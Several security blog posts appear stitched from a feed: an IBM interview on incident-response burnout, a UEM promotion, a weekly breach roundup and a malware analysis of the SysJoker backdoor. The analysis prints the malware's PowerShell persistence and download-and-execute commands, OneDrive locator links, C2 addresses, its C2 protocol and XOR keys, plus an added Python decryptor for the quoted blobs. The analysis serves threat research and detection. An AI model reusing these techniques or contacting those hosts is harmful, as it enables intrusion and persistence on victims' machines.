What cybersecurity pros can learn from first responders

Though they may initially seem very different, there are some compelling similarities between cybersecurity professionals and traditional first responders like police and EMTs. After all, in a world where a cyberattack on critical infrastructure could cause untold damage and harm, cyber responders must be ready for anything.

But are they actually prepared? Compared to the readiness of traditional first responders, how do cybersecurity professionals in incident response stand up? Let’s dig deeper into whether the same sense of urgency exists in cyber and what security leaders can learn from first responders.

What first responders and cyber IR professionals have in common

Troy Bettencourt, Global Head of X-Force Incident Response at IBM, has responder experience at multiple levels, with a background including military, law enforcement and cybersecurity incident response. According to Bettencourt, there are many parallels between military, law enforcement and cybersecurity incident responders.

“A lot of the things that make military and law enforcement successful — or help contribute to their success — is constant training and drilling,” he said. “When you have an emergency incident, if you’re part of an internal team and something happens, you don’t have to expend a lot of mental energy on the tasks that should be routine.”

To be successful, much like the military and first responders, incident responders in the cyber industry must have clearly defined roles and real-world experience. For example, they shouldn’t have to think about how to do a search in their EDR platform or how to query firewall logs or a SIEM.

“That should be practiced all the time,” Bettencourt said. “If you’re training and drilling that all the time, then you’re not consuming your limited mental energy and creating high stress, and you’re reserving the mental energy for the actual valuable tasks.”

For Bettencourt and the X-Force team, standardization is also key. “We want to make sure we’re approaching our analysis in the same way, so that if you have 50 systems to analyze and you spread that workload, you know that the findings can be trusted, but they’re also complete and that items weren’t missed,” he said.

Challenges for the cyber industry

One of the more tangible challenges for incident response (IR) is an overall commitment to cyber readiness. Unlike first responders, who have developed a high level of preparedness in their protocols, cyber still lags behind.

“There is still quite a ways to go,” said Bettencourt.

He acknowledged that while much of X-Force’s work skews toward large, more mature enterprise clients, some in certain sectors are still less mature. Small to medium-sized businesses and even larger enterprise organizations that don’t have the resources to invest in cybersecurity often lack the readiness for IR processes.

“Hopefully, it’s not viewed as an obstruction. The business has to adopt cybersecurity as part of the business and not as just a regulatory component that has to be complied with. Because the barrier to entry for cyber criminals has greatly diminished. It’s so easy to jump on the Dark Web and start getting tools and buying malicious Software-as-a-Service kits. It doesn’t take much to be a cyber criminal.”

But lurking in the shadows of the tangible challenges lies an intangible obstacle: responder burnout and stress. According to Bettencourt, studies have shown that, whether in cybersecurity, law enforcement, the military or other high-risk jobs, people often go above and beyond because of their team.

“They don’t want to let the team and their team members down,” he said.

With that responsibility, many IR professionals are often self-sacrificing and don’t look out for their own well-being. This can lead to significant burnout and stress.

“Now you have diminishing returns. You have talent retention issues, not just for the company, but for the field in general.”

Adopting the right mindset for IR success

To address the readiness challenges and keep pace with first responders, Bettencourt suggests the enterprise focus on three key areas.

Adaptability

While heavy standardization has its advantages, Bettencourt advises that organizations remain flexible, especially in a field where technology and threat approaches are constantly changing and there is a constant need to keep learning.

“Getting set in your ways in this field is a death knell from a career perspective because it’ll rapidly move past you,” he said. “I left the field for about three years, and it was like drinking from a fire hose when I got back — and I had been doing it for about six years before that.”

Encourage smaller teams

Building a small team culture has produced favorable results for the X-Force team.

“It’s an approach that benefits both the individual and the organization,” he said. “I think leaders really need to try to foster that structure, that culture of small teams where you can rely on each other, and by extension, people will go above and beyond because of their teammates. They don’t want to let their team down, which means they don’t want to let the business or clients down.”

Prioritize mental health

While mental health assistance is readily available in the cyber industry, it’s not discussed enough compared to first responders, where accessing such resources has become more normalized over time.

When it comes to trauma in first response jobs compared to IR and cybersecurity, Bettencourt noted that while there may not be as much physical trauma for cyber, the constant stress of working can build up over time and cause strain.

“Being an individual contributor burned me out,” he admitted. “At one point it was four months straight of 60 and 70-hour weeks. All I worked was ransomware and nation-state engagements, and it became too much for me and my family.”

Preventing burnout improves IR

Long hours are, unfortunately, very common in the field. So how can leadership develop the right mindset to reduce burnout?

“If you’re a business that just cares about the bottom line [and not your personnel], keeping responders happy is going to result in better performance and less attrition, which means less talent acquisition costs. In cyber, it still takes time to bring them up to speed. For IR, generally, if you lose somebody, it’s about six months before you get a replacement that can really contribute, which then means you’re burning your other folks out,” Bettencourt said.

“So from a purely business, mercenary perspective, even if your organization is not employee-focused, it makes sense from the standpoint of performance, client satisfaction, delivering quality outcomes — from the standpoint of nurturing talent, maintaining talent, reducing talent acquisition and retention costs. To me, it’s a no-brainer. You have happier people, and when people are happy, they will typically work harder for you.”

By learning some lessons from first responders, organizations can be ready to face whatever the next cyber crisis brings.

To learn how IBM X-Force can help you with anything regarding cybersecurity, including incident response, threat intelligence or offensive security services, schedule a meeting here.

If you are experiencing cybersecurity issues or an incident, contact X-Force to help: US hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034.

The post What cybersecurity pros can learn from first responders appeared first on Security Intelligence.


Unified endpoint management for purpose-based devices

As purpose-built devices become increasingly common, the challenges associated with their unique management and security needs are becoming clear.

What are purpose-built devices? Most are rugged IoT devices used outside an office environment, often running a different operating system than typical office devices. Examples include ruggedized tablets and smartphones, handheld scanners and kiosks.

Many different industries are utilizing purpose-built devices, including travel and transportation, retail, warehouse and distribution, manufacturing (including automotive) and healthcare. These devices, often running on Android Open Source Project (AOSP) and non-GMS (non-Google Mobile Services) platforms, are tailored to specific tasks and environments and can enhance productivity and streamline operations. However, managing and supporting these devices can pose a unique set of difficulties.

For the enterprise, investing in applications to manage these devices may seem like the only viable option. However, with the rapid advancements in Unified Endpoint Management (UEM) solutions, organizations can effectively manage and protect purpose-built devices without purchasing a separate, specialized app.

How can a modern UEM app seamlessly integrate and support purpose-built devices across various industries?

The power of a modern UEM app: Key benefits

A UEM solution is a comprehensive platform designed to manage and secure all types of devices. This includes smartphones, tablets, laptops and IoT devices, regardless of their operating system. UEM apps have evolved to support purpose-built devices, which can now be managed and protected just as efficiently as traditional devices.

Leveraging a wide range of powerful features and capabilities, organizations can address the unique challenges that purpose-built devices pose while streamlining their management processes.

Reduced costs are the most obvious benefit of a UEM app. However, businesses can also take advantage of these ten key benefits and functionalities.

Comprehensive device support: UEM apps support a wide variety of devices and operating systems, including Android Open Source Project (AOSP) and non-GMS platforms. This helps eliminate the need for additional specialized apps.

Customizable profiles and policies: A UEM app allows IT administrators to create custom profiles and policies tailored to specific device types and use cases, enabling them to fine-tune device configurations, security settings and access controls.

Enhanced security: Purpose-built devices often hold sensitive data and are used in critical operations. A UEM app enables IT administrators to implement robust security measures, such as encryption, secure data storage and advanced authentication, to protect from potential threats.

Device compliance: A modern UEM app can help ensure purpose-built devices adhere to industry-specific regulations. By automating device configuration and policy enforcement, a UEM app minimizes the risk of non-compliance and associated penalties.

Simplified updates and maintenance: A UEM app can automate software updates, patches and maintenance tasks for purpose-built devices. This ensures they remain up-to-date and secure — reducing downtime and maximizing device efficiency.

Reduced costs: By consolidating device management into a single UEM app, organizations can eliminate the need for multiple specialized apps, resulting in a lower total cost of ownership (TCO).

Remote monitoring and troubleshooting: Modern UEM apps provide IT administrators with real-time visibility into the status and performance of purpose-built devices, including monitoring device health, network connectivity and battery life. UEM apps can also enable remote troubleshooting and diagnostics.

App management and distribution: A UEM app simplifies the process of deploying, updating and managing apps on purpose-built devices. IT administrators can centrally manage app catalogs, so devices have access to the latest versions of critical apps. IT teams can remotely install, update or remove apps on devices to streamline app management across the organization.

Context-aware management: By incorporating context-aware capabilities, UEM apps allow IT administrators to apply policies and configurations based on factors such as device location, network connectivity or user roles.

Scalability and future-proofing: A UEM app can scale and adapt to the evolving needs of an organization. As businesses grow and adopt new purpose-built devices, a UEM app can easily expand its support to accommodate these devices.

Integration with other IT systems: Current UEM apps seamlessly integrate with other IT systems and platforms, such as enterprise mobility management (EMM) solutions, identity and access management (IAM) systems and IT service management (ITSM) tools.


Which industries can benefit from UEM apps?

A modern UEM app can support purpose-built devices across a diverse set of industries. Here are the most common:

Travel and transportation: Purpose-built devices here often include ticketing machines, fleet management devices and navigation systems. A UEM app manages these devices efficiently, keeping them updated and protected from security threats.

Retail: Retailers rely on devices such as point-of-sale (POS) systems, inventory scanners and digital signage. A UEM app can manage these devices, secure payment transactions and streamline device deployment and updates.

Warehouse and distribution: Purpose-built devices such as barcode scanners, inventory management systems and forklift-mounted tablets are essential in a warehouse environment.

Manufacturing (including automotive): Manufacturers use purpose-built devices for quality control, production line automation and inventory management. Like in warehouse and distribution, a UEM app can help manage these devices, ensure they comply with industry standards and protect sensitive data.

Healthcare: Healthcare providers use purpose-built devices such as patient monitoring systems, medical imaging equipment and electronic health record (EHR) systems. A UEM app can help secure patient data, keep devices compliant with HIPAA and other regulations and simplify device management across the healthcare ecosystem.

How the enterprise can best leverage UEM

The increasing use of purpose-built devices across various industries requires a robust and flexible management solution. UEM apps have evolved to meet this challenge, providing a comprehensive platform that can effectively manage and protect purpose-built devices alongside traditional devices.

IBM commissioned Forrester Consulting to conduct a Total Economic Impact™ study to help IT and security leaders realize, demonstrate and justify the tangible value of their investment in unified endpoint management.

This study applied Forrester’s TEI methodology to examine the potential return on investment enterprises may capture by deploying IBM MaaS360 with Watson UEM.

Forrester interviewed and surveyed several customers with years of experience using MaaS360 to help key decision-makers identify the cost, benefit, flexibility and risk factors that affect their UEM investment decision.

Conclusion

By adopting a UEM app, organizations can centralize device management, enhance security, ensure compliance, streamline updates and maintenance and reduce costs. This allows businesses to fully leverage the benefits of purpose-built devices without the need for additional specialized applications.

Ultimately, that increased operational efficiency can give your organization the competitive advantage it needs.

The post Unified endpoint management for purpose-based devices appeared first on Security Intelligence.


27th November – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 27th November, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

Nevada-based medical transcription company Perry Johnson & Associates (PJ&A) has disclosed a data breach that affected more than 9M patients at multiple healthcare providers in the US. The exposed data includes patients’ names, addresses, dates of birth, Social Security Numbers, and medical records. The attack is considered one of the most severe medical data breaches in recent years.
The British Library, one of the largest libraries in the world, suffered a ransomware attack that resulted in the exposure of internal human resources data. The Rhysida ransomware gang has claimed responsibility, setting a starting price of 20 bitcoins (approximately $750K) as a ransom with a seven-day deadline.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Ransomware.Win.Rhysida; Ransomware.Wins.Rhysida)

A cyberattack on Vanderbilt University Medical Center (VUMC), which operates seven hospitals and numerous healthcare facilities across Nashville, Tennessee, has resulted in a data breach. The Meow ransomware gang has claimed responsibility for the attack.
A sophisticated cyberattack on CTS, a UK-based managed service provider (MSP), has disrupted services for hundreds of law firms. The attack blocked hundreds of British law firms from accessing their case management systems, causing delays in legal proceedings and disrupting communication between clients and lawyers. CTS is working to restore services, but no timeline has been given.
Ransomware group AlphV/BlackCat has assumed responsibility for the cyber-attack on the American real estate insurance giant Fidelity National Financial (FNF), a Fortune 500 company, resulting in the shutdown of its network.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.BlackCat, Ransomware_Linux_BlackCat)

The Idaho National Laboratory (INL), a US-based nuclear research center, has confirmed a data breach that resulted in the exposure of internal human resources data. The hacktivist group SiegedSec took responsibility for the attack, claiming to have stolen the personal information of hundreds of thousands of employees, users, and citizens. The allegedly leaked data includes full names, dates of birth, email addresses, phone numbers, Social Security Numbers, addresses and employment info.

VULNERABILITIES AND PATCHES

Sucuri has released its WordPress Vulnerability & Patch Roundup November 2023. Among the vulnerabilities is the high-severity Elementor Website Builder Stored Cross-Site Scripting flaw (CVE-2023-47505), nine additional medium-severity flaws including WooCommerce Checkout Manager Missing Authorization flaw (CVE-2023-47681), and other low-severity flaws.
The open-source file-sharing software ownCloud has warned of three critical security vulnerabilities, including a flaw in containerized deployments for certain graphapi versions, a WebDAV Api Authentication Bypass using Pre-Signed URLs affecting core versions, and a Subdomain Validation Bypass in oauth2. These flaws could be exploited to expose confidential data and manipulate files.
Mozilla has released security patches for Firefox and Thunderbird, which address multiple high-severity vulnerabilities. Some of the vulnerabilities potentially allowed remote code execution if exploited.

THREAT INTELLIGENCE REPORTS

Check Point Research provides a case study of some of the most recent ransomware attacks targeting Linux and ESXi systems, which have been increasing over the last few years. The study, encompassing 12 prominent ransomware families, investigates the motivations behind developing ransomware for Linux and reveals that many Linux-targeting families heavily utilize the OpenSSL library along with ChaCha20/RSA and AES/RSA algorithms.
Check Point Research shares insights from its active tracking of the evolution of SysJoker, a previously publicly unattributed multi-platform backdoor, which we assess was utilized by a Hamas-affiliated APT to target Israel. Notably, the tool went through prominent changes, including the shift to the Rust language and a move to using OneDrive instead of Google Drive to store dynamic C2 URLs.

Check Point Harmony Endpoint, Threat Emulation and Anti-Bot provide protection against this threat (Backdoor.Wins.Sysjoker.ta, Backdoor_Linux_SysJoker, Backdoor.Win.SysJoker, Backdoor.WIN32.SysJoker)

Check Point Research, using its Threat Intel Blockchain system, uncovered an ongoing sophisticated Rug Pull scheme that managed to pilfer nearly $1M. The actor behind this scheme was traced, revealing that the perpetrator lured unsuspecting victims into investing by riding the crowd’s hype around ill-gotten gains.

CISA has published a #StopRansomware report on LockBit 3.0 ransomware operation. The report is based, among others, on information shared by Boeing, which had been affected by the group recently.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Lockbit; Gen.Win.Crypter.Lockbit; Ransomware.Wins.LockBit.ta; Ransomware_Linux_Lockbit)

The post 27th November – Threat Intelligence Report appeared first on Check Point Research.


Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker

Key Findings

Check Point Research is actively tracking the evolution of SysJoker, a previously publicly unattributed multi-platform backdoor, which we assess was utilized by a Hamas-affiliated APT to target Israel.

Among the most prominent changes is the shift to the Rust language, which indicates the malware code was entirely rewritten while still maintaining similar functionality. In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command and control server) URLs.

Analysis of newly discovered variants of SysJoker revealed ties to previously undisclosed samples of Operation Electric Powder, a set of targeted attacks against Israeli organizations between 2016 and 2017 that were loosely linked to the threat actor known as Gaza Cybergang.

Introduction

Amid tensions in the ongoing Israel-Hamas war, Check Point Research has been conducting active threat hunting in an effort to discover, attribute, and mitigate relevant regional threats. Among those, some new variants of the SysJoker malware, including one coded in Rust, recently caught our attention. Our assessment is that these were used in targeted attacks by a Hamas-related threat actor.

SysJoker, initially discovered by Intezer in 2021, is a multi-platform backdoor with multiple variants for Windows, Linux and Mac. The same malware was also analyzed in another report a few months after the original publication. Since then, SysJoker Windows variants have evolved enough to stay under the radar.

As we investigated the newer variants of SysJoker that were utilized in targeted attacks in 2023, we also discovered a variant written in Rust, which suggests the malware code was completely rewritten. In addition, we also uncovered behavioral similarities with another campaign named Operation Electric Powder which targeted Israel in 2016-2017. This campaign was previously linked to Gaza Cybergang (aka Molerats), a threat actor operating in conjunction with Palestinian interests.

In this article, we drill down into the Rust version of SysJoker, as well as disclose additional information on other SysJoker Windows variants and their attribution.

Rust SysJoker Variant

The SysJoker variant (9416d7dc2ecdeda92ba35cd5e54eb044), written in Rust, was submitted to VirusTotal with the name php-cgi.exe on October 12, 2023. Compiled a few months earlier on August 7, it contains the following PDB path: C:\Code\Rust\RustDown-Belal\target\release\deps\RustDown.pdb.

The malware employs random sleep intervals at various stages of its execution, which may serve as possible anti-sandbox or anti-analysis measures.

The sample has two modes of operation which are determined by its presence in a particular path. This is intended to differentiate the first execution from any subsequent ones based on persistence.

First, it checks whether the current running module matches the path C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe. Based on the outcome, the malware proceeds to one of the two possible stages.

First execution

If the sample runs from a different location, indicating it’s the first time the sample is executed, the malware copies itself to the path C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe and then runs itself from the newly created path using PowerShell with the following parameter:

-Command C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe

Finally, it creates a persistence mechanism and then exits the program.

Persistence is established in an unusual way, using PowerShell with the following argument:

-Command "$reg=[WMIClass]'ROOT\DEFAULT:StdRegProv';
$results=$reg.SetStringValue('&H80000001','Software\Microsoft\Windows\CurrentVersion\Run', 'php-cgi', 'C:\ProgramData\php-7.4.19-Win32-vc15-x64\php-cgi.exe');"

Eventually, this PowerShell code creates a registry Run key in the HKEY_CURRENT_USER hive, which points to the copy of the executable, using the WMI StdRegProv class instead of directly accessing the registry via the Windows API or reg.exe.

Subsequent executions (from persistence)

SysJoker contacts a URL on OneDrive to retrieve the C2 server address. The URL is hardcoded and encrypted inside the binary:

https://onedrive.live[.]com/download?resid=16E2AEE4B7A8BBB1%21112&authkey=!AED7TeCJaC7JNVQ

The response should contain a XOR-encrypted blob of data that is encoded in base64. During our investigation, the following response was received:

KnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr

After decryption, the C2 IP address and port are revealed:

{"url":"http://85.31.231[.]49:443"}

Using OneDrive allows the attackers to easily change the C2 address, which enables them to stay ahead of different reputation-based services. This behavior remains consistent across different versions of SysJoker.

The malware collects information about the infected system, including the Windows version, username, MAC address, and various other data. This information is then sent to the /api/attach API endpoint on the C2 server, and in response it receives a unique token that serves as an identifier when the malware communicates with the C2:

Figure 1 – Bot registration api call.

After registration with the C2 server, the sample runs the main C2 loop. It sends a POST request containing the unique token to the /api/req endpoint, and the C2 responds with JSON data:

Figure 2 – Command request and response.

The expected response from the server is a JSON that contains a field named data, which holds an array of actions for the sample to execute. Each array element consists of id and request fields. The request field is another JSON, carried as a string, with fields called url and name. An example of the response from the server:

{"data":[{"id":"1", "request":"{\"url\": \"http://85.31.231[.]49/archive_path\", \"name\":\"mal_1.exe\"}"}, {"id":"2", "request":"{\"url\": \"http://85.31.231[.]49/archive_path\", \"name\":\"mal_2.exe\"}"}]}

The malware downloads a zip archive from the URL specified in the url field. The archive contains an executable that, after unzipping, is saved under the name given in the name field in the C:\ProgramData\php-Win32-libs folder. The archive is unzipped using the following PowerShell command:

powershell -Command Expand-Archive -Path C:\ProgramData\php-Win32-libs\XMfmF.zip -DestinationPath C:\ProgramData\php-Win32-libs ; start C:\ProgramData\php-Win32-libs\exe_name.exe

It is important to mention that in previous SysJoker operations, the malware was able not only to download and execute remote files from an archive but also to execute commands dictated by the operators. This functionality is missing in the Rust version. After receiving and executing the file download command, depending on whether the operation was successful or not, the malware contacts the C2 server again and sends a success or exception message to the path /api/req/res. The server sends back a JSON confirmation indicating that it has received the information: {"status":"success"}.

Encryption

The malware has two methods for string decryption. The first method is simple and appears across multiple SysJoker variants. The sample contains several base64-encoded encrypted data blobs and a base64-encoded key. Upon decryption, both blobs are base64-decoded and then XORed to produce the plain text strings.

The second encryption method is tedious and is spliced in-line throughout the program repeatedly at compile time. This generates a complex string decryption algorithm throughout the sample.

Figure 3 – Example of the decryption of the string “php-”.

Windows SysJoker Variants

In addition to the newly found Rust variant, we uncovered two more SysJoker samples that were not publicly exposed in the past. Both of these samples are slightly more complex than the Rust version or any of the previously analyzed samples, possibly due to the public discovery and analysis of the malware. One of these samples, in contrast to other versions, has a multi-stage execution flow, consisting of a downloader, an installer, and a separate payload DLL.

DMADevice variant

The DMADevice sample (d51e617fe1c1962801ad5332163717bb) was compiled in May 2022, a few months after SysJoker was first uncovered.

Like other versions, the malware starts by retrieving the C2 server address by contacting the URL: 

https://onedrive.live[.]com/download?cid=F6A7DCE38A4B8570&resid=F6A7DCE38A4B8570!115&authkey=AKcf8zLcDneJZHw

The OneDrive link responds with an encrypted base64-encoded string, which is decrypted with the XOR key QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT. This is the same key that is used in the Rust version.

The decrypted blob contains a JSON with the C2 domain in the following format:

{"url":"http://sharing-u-file[.]com"}

Next, the malware proceeds to the three-stage execution process.

1. Setup files and persistence

The sample generates a unique bot ID, sends it in a POST request to the /api/cc API endpoint, and receives back the JSON describing the desired malware setup on the infected machine.

The JSON has the following structure:

{"key":"f57d611b-0779-4125-a3e8-4f8ca3116509","pi":"VwUD[REDACTED]","data":"PRdkHUVFVA9pQl5BXA8YE2JHQgZBBFVpVRJZQU0RdXx3cVVPD1ZSRhoTdS9sY1hbTFldXlx8QwIRSRppeSdrDA1GRVhZW3lXBRtSHFMTHUBpfXZkVkFBRVtaQyhdBhZJWAoaT0NDXkZTR0NRA1lbSlNJVEABElRaXQ8YE11FSA8RSRpeQAdKF0MfE20ZVhBrI3IXJXJ1ESpmc2JrZX57d2ZibDN2OWRgXQVKDBJcV0VqaWdQCFFYE0VtbSFYQkVSV1liVEBGRA5dOWR/QQgYP05lEx0UaR9NRmdyI2lia0JxH3MVFQ8aVEpQD00RQV1DQlxNEARBX1BbUBBFRnpCEBt3WA5IEBpyV05bVVtbSkEUEExLDEEYREMfE2J5c2RuJ2dyOGp8WAFfX0RYX1lobWVcQwVcEktxaCVNERNWX0VgUEJKD1pZOGpjRAwPbQ=="}

The field key in the JSON is used to XOR-decrypt the other fields after they are base64-decoded: the pi field contains the victim’s IP address and the data field contains the array with multiple values:

["SystemDrive","ProgramData","DMADevice","DMASolutionInc","DMASolutionInc.exe","DMASolutionInc.dll","powershell.exe","cmd","open","start","/c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V","/t REG_SZ /D",".exe","$env:username | Out-File -Encoding 'utf8' '","SOFTWARE\Microsoft\Windows\CurrentVersion\Run"]

Those values are utilized in the following order:

SystemDrive – Get the system hard drive letter.

ProgramData – Create these two folders under the specified (in this case, ProgramData) folder:
– DMADevice – The first folder name created.
– DMASolutionInc.exe – The file name used by the currently running executable to self-replicate into the DMADevice folder.

DMASolutionInc.dll – The name of the config file.

DMASolutionInc – The second folder name created.

The rest of the values are used in a few commands that establish persistence via the registry Run key and retrieve the current user name from $env into the temporary txt file.

The config file, in our case DMASolutionInc.dll, is stored on disk encrypted (using the same key used to decrypt the domain) and base64-encoded. It contains encrypted JSON with the following fields:

{"id":"[BOT-ID]","us":"[USERNAME]","ip":"[IP]"}

After performing all these operations, the sample executes its copy from DMASolutionInc.exe and exits.
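The first string-decryption method described in the Encryption section (base64-decode, then XOR) applied to the two blobs quoted in this report, as an added example and not Check Point’s or the malware’s code: the Rust variant’s OneDrive locator decrypted with the shared XOR key given for the DMADevice sample, and the DMADevice /api/cc data field decrypted with the response’s own key field. Function and constant names are this example’s own, the redacted pi field is omitted, and recovered indicators are defanged the way the report prints them.

```python
import base64
import json
from itertools import cycle

# OneDrive locator response and XOR key as quoted in the report (the report states
# the Rust variant and the DMADevice sample share this key).
ONEDRIVE_BLOB = "KnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr"
SHARED_XOR_KEY = (
    "QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT"
)

# DMADevice /api/cc setup response as quoted in the report; its "key" field is the
# XOR key for the other fields. The redacted "pi" field is left out here.
SETUP_RESPONSE = {
    "key": "f57d611b-0779-4125-a3e8-4f8ca3116509",
    "data": (
        "PRdkHUVFVA9pQl5BXA8YE2JHQgZBBFVpVRJZQU0RdXx3cVVPD1ZSRhoTdS9sY1hb"
        "TFldXlx8QwIRSRppeSdrDA1GRVhZW3lXBRtSHFMTHUBpfXZkVkFBRVtaQyhdBhZJ"
        "WAoaT0NDXkZTR0NRA1lbSlNJVEABElRaXQ8YE11FSA8RSRpeQAdKF0MfE20ZVhBr"
        "I3IXJXJ1ESpmc2JrZX57d2ZibDN2OWRgXQVKDBJcV0VqaWdQCFFYE0VtbSFYQkVS"
        "V1liVEBGRA5dOWR/QQgYP05lEx0UaR9NRmdyI2lia0JxH3MVFQ8aVEpQD00RQV1D"
        "QlxNEARBX1BbUBBFRnpCEBt3WA5IEBpyV05bVVtbSkEUEExLDEEYREMfE2J5c2Ru"
        "J2dyOGp8WAFfX0RYX1lobWVcQwVcEktxaCVNERNWX0VgUEJKD1pZOGpjRAwPbQ=="
    ),
}


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; the key is cycled when data is longer."""
    if not key:
        raise ValueError("empty XOR key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decrypt_sysjoker_blob(blob_b64: str, key: str) -> str:
    """Base64-decode the blob, then XOR it with the key (method 1 in the report).

    Padding is restored so a blob copied from a report or proxy log still decodes,
    and undecodable bytes are rendered as U+FFFD rather than raising, so a wrong
    key shows up as garbage in the output instead of an exception.
    """
    text = blob_b64.strip()
    padded = text + "=" * (-len(text) % 4)
    raw = base64.b64decode(padded)
    return xor_with_key(raw, key.encode()).decode("utf-8", errors="replace")


def defang(url: str) -> str:
    """Bracket the last dot of the host (85.31.231[.]49) so the indicator is not clickable."""
    scheme, sep, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    if "." in host:
        head, _, tail = host.rpartition(".")
        host = f"{head}[.]{tail}"
    return f"{scheme}{sep}{host}{slash}{path}"


def c2_from_onedrive_blob(blob_b64: str, key: str = SHARED_XOR_KEY) -> str:
    """Recover the C2 URL from the OneDrive locator JSON and return it defanged."""
    config = json.loads(decrypt_sysjoker_blob(blob_b64, key))
    return defang(config["url"])


def decrypt_setup_fields(response: dict) -> dict:
    """Decrypt every base64+XOR field of a DMADevice /api/cc response with its own key."""
    key = response["key"]
    return {
        name: decrypt_sysjoker_blob(value, key)
        for name, value in response.items()
        if name != "key"
    }


if __name__ == "__main__":
    print("C2 from OneDrive locator:", c2_from_onedrive_blob(ONEDRIVE_BLOB))
    print("DMADevice setup strings:", decrypt_setup_fields(SETUP_RESPONSE)["data"])
```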

2. Register with the C2 server

When the sample is executed again (via persistence from the previous stage), it checks the location it is running from. It then continues the execution by making a POST request to /api/add containing the uuid, user name, and user token, which is also generated by the malware:

uuid=bot-id&nu=username&user_token=token

The server responds with a token generated on its side which is then used for all the subsequent C2 requests.

3. C2 main loop

The token received during the previous stage is used for making POST requests to /api/cr on the C2 server to retrieve the commands to execute.

Similar to other SysJoker variants, the server responds with a JSON that contains field data which is an array of actions to take. This version can download and execute files or run commands and upload the results to the C2 server. For each command in the array, the sample sends a response reporting if it was successful or not.

AppMessagingRegistrar variant

This variant has a compilation timestamp of June 2022 and has a quite different execution flow. The functionality of the malware is divided into two separate components: a downloader (DDN, c2848b4e34b45e095bd8e764ca1a4fdd) and a backdoor (AppMessagingRegistrar, 31c2813c1fb1e42b85014b2fc3fe0666).

DDN Downloader

The threat actors first deliver a lightweight downloader. It creates the folder C:\ProgramData\NuGet Library, then downloads a zip file from https://filestorage-short[.]org/drive/AppMessagingRegistrar.zip. It unzips the file, copies the contents into the AppMessagingRegistrar.exe file and then executes it.

Splitting the functionality into separate components has proved effective: at the time of the first submission to VirusTotal (VT), the malware was not detected by any of the platform’s engines:

Figure 4 – DDN downloader with 0 detections on its first submission to VT (2023-04-09).

AppMessagingRegistrar

Upon execution, this payload first checks the registry key SOFTWARE\Intel\UNP\ProgramUpdates\UUID for the UUID of the PC. If the registry key is not present, a UUID is generated using the UuidCreate function and is then saved to that key.

Figure 5 – Uuid Generation.

The variant then proceeds to decrypt a hardcoded OneDrive URL to retrieve a C2 address. The XOR key in this sample is 22GC18YH0N4RUE0BSJOAVW24624ULHIQGS4Y1BQQUZYTENJN2GBERQBFKF2W78H7.

After the C2 address is decrypted, a POST request is made to the C2 server API endpoint /api/register which contains the previously generated UUID.

The server responds with a JSON containing a token and a status message: 

{"status": "success", "token":"[TOKEN]", "status_num":1}

The status indicates whether the request was valid, and the sample checks specifically for the string “success”. The token is used for all the following C2 requests, but unlike all the other samples, it is sent in the Authorization header (Authorization: Bearer [TOKEN]) instead of in the request body. This change could be to accommodate additional flows in the malware execution (discussed below) in which the malware sends a GET request instead of a POST and the server needs a way to identify the sender.

The status_num field is used as a global flag to indicate what actions the bot should take. There are four statuses available:

Status number – Action – Description
0 – Setup – Download MsoftInit.dll and execute the init and step exports.
1 – Idle loop – Wait for status_num to change.
3 – Payload retrieval – Download and save the MsoftNotify.dll DLL.
4 – Payload execution – Execute the MsoftNotify.dll DLL.

Setup phase
If the received status_num is 0, the malware creates the C:\ProgramData\Intel\UNP\ProgramUpdates and C:\ProgramData\Intel\Drivers\MsoftUpdates folders. It then proceeds to:

Download a DLL file using the function UrlDownloadToFileW from the path /api/library/[TOKEN] and save it to C:\ProgramData\Intel\Drivers\MsoftUpdates\MsoftInit.dll.

Load the MsoftInit.dll and call the init exported function.

Load the same DLL again and call the step exported function.

The exact purpose of those functions is unknown as we were not able to retrieve the DLL. However, due to the names and our analysis of previous versions of the malware, we believe they were part of the persistence and setup process. Finally, the malware sends an empty POST request to the API endpoint /api/update. The expected response from the server is an empty JSON.

Idle loop
If the status_num is 1, the malware continues to make requests to the C2 API endpoint /api/status in an infinite loop. To break the loop, the status_num must change.

Main payload download
If the status_num is 3, the malware proceeds to download a DLL file from the URL /api/library/[TOKEN] and saves it to the path C:\ProgramData\Intel\Drivers\MsoftUpdates\MsoftNotify.dll. It then sends a request to the C2 API endpoint /api/ready: if the server responds with a status of success, the status flag is set to 4.

Payload execution
If the status is 4, the malware proceeds to make a GET request to the C2 API endpoint /api/requests. The C2 server responds with a JSON with 3 parameters, id, r, and k.

The malware then loads the MsoftNotify.dll DLL and resolves the function st. The r and k values sent from the server are passed to st as parameters. We were not able to retrieve the DLL, but based on the previous versions, this is likely a version of the backdoor's main command-running functionality, and its return value should be a string. After the function runs and returns a result, the id received from the server is used in a POST request to the C2 which contains the output:

POST /api/requests/[ID] HTTP/1.1
Host: [62.108.40.129](https://www.virustotal.com/gui/url/79fde5d4b19cbd1f920535215c558b6ff63973b7af7d6bd488e256821711e0b1)
Accept: application/json
Authorization: Bearer [TOKEN]
Content-Length: 15
Content-Type: application/x-www-form-urlencoded

response=[EXECUTION OUTPUT]
